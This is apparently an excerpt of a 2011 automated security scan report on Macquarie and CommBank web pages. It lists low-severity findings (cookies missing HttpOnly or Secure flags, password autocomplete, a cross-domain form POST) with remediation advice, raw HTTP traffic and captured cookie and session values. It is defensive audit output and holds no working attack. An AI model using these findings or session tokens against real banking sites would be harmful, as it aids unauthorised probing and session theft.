x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9zYXZpbmdzLWFjY291bnRzL3Rlcm0tZGVwb3NpdHMvdGVybS1kZXBvc2l0cw..
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Macquarie > Pers
...[SNIP]...

4.24. https://www.macquarie.com.au/mgl/au/personal/superannuation/self-managed/equity-lever previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/superannuation/self-managed/equity-lever

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mgl/au/personal/superannuation/self-managed/equity-lever HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:31:58 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 127707
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9zdXBlcmFubnVhdGlvbi9zZWxmLW1hbmFnZWQvZXF1aXR5LWxldmVy
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Macquarie Equity Le
...[SNIP]...

4.25. https://www.macquarie.com.au/mgl/au/personal/trading/international-money-transfers/international-money-transfers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/trading/international-money-transfers/international-money-transfers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mgl/au/personal/trading/international-money-transfers/international-money-transfers HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:31:55 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 119850
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC90cmFkaW5nL2ludGVybmF0aW9uYWwtbW9uZXktdHJhbnNmZXJzL2ludGVybmF0aW9uYWwtbW9uZXktdHJhbnNmZXJz
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Macquarie > Fina
...[SNIP]...

5. Password field with autocomplete enabled previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.commbiz.commbank.com.au
Path:	/

Issue detail

The page contains a form with the following action URL:

https://login.commbiz.commbank.com.au/?CBAAUTH=LOGIN

The form contains the following password fields with autocomplete enabled:

__cbaPassword
__cbaOnetimePassword

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /?cbaauth=prelogin HTTP/1.1
Host: login.commbiz.commbank.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.commbank.com.au/business/international/importers/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cmgkw=%5B%5B%27ns%257Caustralia%2520bank%27%2C%271317133223146%27%5D%5D; c_m=australia%20bankGooglewww.google.com; __utma=176409783.1366260428.1317133221.1317133221.1317133221.1; __utmb=176409783.3.10.1317133221; __utmc=176409783; __utmz=176409783.1317133221.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=australia%20bank; s_cc=true; gpv_p6=no%20value; s_nr=1317134136002; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 14:35:42 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7555
Set-Cookie: CBACBS=1; domain=commbank.com.au; path=/
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title>Log on to CommBiz</title>
<meta
...[SNIP]...
</div>
<form name=form1 method=post autoco="OFF" action="https://login.commbiz.commbank.com.au/?CBAAUTH=LOGIN" >
<div class="ContainerformRowTwoCol">
...[SNIP]...
</label>
<input type=password name=__cbaPassword size=16 class="TxtBoxLogin">
</div>
...[SNIP]...
</label>
<input type=password name=__cbaOnetimePassword size=16 class="TxtBoxLogin">
</div>
...[SNIP]...

6. Cross-domain POST previous next
There are 2 instances of this issue:

/mgl/au/personal/campaigns/financial-advice/advice
/mgl/au/personal/campaigns/financial-advice/advice

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

6.1. https://www.macquarie.com.au/mgl/au/personal/campaigns/financial-advice/advice previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/campaigns/financial-advice/advice

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

oid
retURL
Campaign_ID
recordType
lead_source
00N90000001GSG2
salutation
salutation
salutation
salutation
salutation
salutation
otherSalutation
first_name
last_name
phone
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
email

Request

GET /mgl/au/personal/campaigns/financial-advice/advice HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 14:31:47 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache
X-Powered-By: Servlet/2.4 JSP/2.0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


                   <title>Macquarie Priva
...[SNIP]...
</p>
                    <form id="requestInfoForm" method="post" onsubmit="validateEUpdateForm()" action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8">
                    <div class="VC-pageToolsForm">
...[SNIP]...

6.2. https://www.macquarie.com.au/mgl/au/personal/campaigns/financial-advice/advice previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/campaigns/financial-advice/advice

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

oid
retURL
Campaign_ID
recordType
lead_source
00N90000001GSG2
salutation
salutation
salutation
salutation
salutation
salutation
otherSalutation
first_name
last_name
phone
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
00N90000000g6vG
email

Request

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 14:31:47 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache
X-Powered-By: Servlet/2.4 JSP/2.0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


                   <title>Macquarie Priva
...[SNIP]...
</p>
                    <form action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" onsubmit="validateEUpdateForm()" id="requestInfoForm" method="post">
                    <div class="VC-pageToolsForm">
...[SNIP]...

7. SSL cookie without secure flag set previous next
There are 25 instances of this issue:

/mgl/au/personal/
/mgl/au/personal/a
/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg.ajax4jsf.javascript.AjaxScript
/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg/ajax4jsf/javascript/scripts/form.js
/mgl/au/personal/credit-cards
/mgl/au/personal/error404.htm
/mgl/au/personal/financial-advice/stockbroking
/mgl/au/personal/financial-advice/stockbroking/futures
/mgl/au/personal/financial-advice/strategic-wealth-management
/mgl/au/personal/insurance/life-insurance/macquarie-life-active
/mgl/au/personal/js/core/jquery-1.4.2.js
/mgl/au/personal/js/core/jquery-ui-1.8.1.js
/mgl/au/personal/js/core/mac-libraries.js
/mgl/au/personal/js/swfobject.js
/mgl/au/personal/loans/home-loans
/mgl/au/personal/personal/images/ajax-loader-small.gif
/mgl/au/personal/personal/images/butonArrow.gif
/mgl/au/personal/personal/images/macquarie_personal_print_logo.gif
/mgl/au/personal/personal/images/spacer.gif
/mgl/au/personal/retail_portal/templateProxy.htm
/mgl/au/personal/savings-accounts/high-interest-savings-accounts
/mgl/au/personal/savings-accounts/term-deposits/term-deposits
/mgl/au/personal/search-results
/mgl/au/personal/superannuation/self-managed/equity-lever
/mgl/au/personal/trading/international-money-transfers/international-money-transfers

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

7.1. https://www.macquarie.com.au/mgl/au/personal/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TS529c02=e0a150b02758db439940140941aa77aa36824e21333054354e81db99a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
TS56ffcb=b464da69b13923aacb9a28d53a47e3dd36824e21333054354e81db99a3a2c207ffffffff60ac0ec54c1932dd; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.2. https://www.macquarie.com.au/mgl/au/personal/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/a

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
TS56ffcb=f4347a9ca922d584c07fc6127143527d36824e21333054354e81df4ca3a2c207ffffffff60ac0ec52216cdf4e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.3. https://www.macquarie.com.au/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg.ajax4jsf.javascript.AjaxScript previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg.ajax4jsf.javascript.AjaxScript

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.4. https://www.macquarie.com.au/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg/ajax4jsf/javascript/scripts/form.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg/ajax4jsf/javascript/scripts/form.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=6b750404976bd9d43300142d1262f18236824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fb41d8a4b5072448f; Max-Age=900; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.5. https://www.macquarie.com.au/mgl/au/personal/credit-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/credit-cards

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mgl/au/personal/credit-cards HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.6. https://www.macquarie.com.au/mgl/au/personal/error404.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/error404.htm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TS529c02=43e45c3536d34e069d7168ad6141a99d36824e21333054354e81df4ca3a2c207ffffffff60ac0ec564c07226e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/
TS56ffcb=da4c96ae87214a7cfdddddc72b3174c536824e21333054354e81db99a3a2c207ffffffff60ac0ec5f750db6a; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.7. https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/stockbroking

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS529c02=95862cd09a9e787d7b47d60b5616e4af211a84e9e41fe7b64e81deebaac4ce84002f3168; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.8. https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking/futures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/stockbroking/futures

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.9. https://www.macquarie.com.au/mgl/au/personal/financial-advice/strategic-wealth-management previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/strategic-wealth-management

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TS529c02=6d3121c4af65fef40e668ee7fb3732cf36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/
TS56ffcb=512364cc00d5eeddc99bfda3c4741b5e36824e21333054354e81db99a3a2c207ffffffff60ac0ec591176cf2; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.10. https://www.macquarie.com.au/mgl/au/personal/insurance/life-insurance/macquarie-life-active previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/insurance/life-insurance/macquarie-life-active

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.11. https://www.macquarie.com.au/mgl/au/personal/js/core/jquery-1.4.2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/js/core/jquery-1.4.2.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
TS56ffcb=805e12e29c285a78695c31fb4923ffbd36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5b8bbade2e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.12. https://www.macquarie.com.au/mgl/au/personal/js/core/jquery-ui-1.8.1.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/js/core/jquery-ui-1.8.1.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=6b750404976bd9d43300142d1262f18236824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fb41d8a4b5072448f; Max-Age=900; Path=/
TS56ffcb=92ff4c972dfea93490410c5f108aae0e36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5aff4167ae902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.13. https://www.macquarie.com.au/mgl/au/personal/js/core/mac-libraries.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/js/core/mac-libraries.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=6b750404976bd9d43300142d1262f18236824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fb41d8a4b5072448f; Max-Age=900; Path=/
TS56ffcb=9a1c4188433aa226a3e740190278cc0d36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5d05afeefe902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.14. https://www.macquarie.com.au/mgl/au/personal/js/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/js/swfobject.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
TS56ffcb=797265576906e797b1b904338b2324a036824e21333054354e81df4ca3a2c207ffffffff60ac0ec580d2844ee902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.15. https://www.macquarie.com.au/mgl/au/personal/loans/home-loans previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/loans/home-loans

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/
TS56ffcb=675450af7575e0d7591ff9edd03ccad436824e21333054354e81db99a3a2c207ffffffff60ac0ec5d3578ee6; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/loans/home-loans HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.16. https://www.macquarie.com.au/mgl/au/personal/personal/images/ajax-loader-small.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/personal/images/ajax-loader-small.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
TS56ffcb=7353404d7e3ec623c865ac1e4a9260f536824e21333054354e81df4ca3a2c207ffffffff60ac0ec5cfbc8e60e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.17. https://www.macquarie.com.au/mgl/au/personal/personal/images/butonArrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/personal/images/butonArrow.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
TS56ffcb=636c82540acc74f6ff551fbcada48d5c36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5e51fa032e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.18. https://www.macquarie.com.au/mgl/au/personal/personal/images/macquarie_personal_print_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/personal/images/macquarie_personal_print_logo.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
TS56ffcb=d2ce6d42c45f8a2f1373d7e25659eb6c36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5850159d2e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.19. https://www.macquarie.com.au/mgl/au/personal/personal/images/spacer.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/personal/images/spacer.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
TS56ffcb=a74611c34689e2e1c41e28391a98e13836824e21333054354e81df4ca3a2c207ffffffff60ac0ec57d321d21e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.20. https://www.macquarie.com.au/mgl/au/personal/retail_portal/templateProxy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/retail_portal/templateProxy.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS529c02=6d3121c4af65fef40e668ee7fb3732cf36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.21. https://www.macquarie.com.au/mgl/au/personal/savings-accounts/high-interest-savings-accounts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/savings-accounts/high-interest-savings-accounts

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TS529c02=2765a8b12f3d12dbabc965e7e126f487a81f016caed108444e81df00aac4ce84002f3168; Max-Age=900; Path=/
TS56ffcb=6685503123bcbc56eec66ee7291ab0b036824e21333054354e81db99a3a2c207ffffffff60ac0ec50e54be37; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.22. https://www.macquarie.com.au/mgl/au/personal/savings-accounts/term-deposits/term-deposits previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/savings-accounts/term-deposits/term-deposits

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

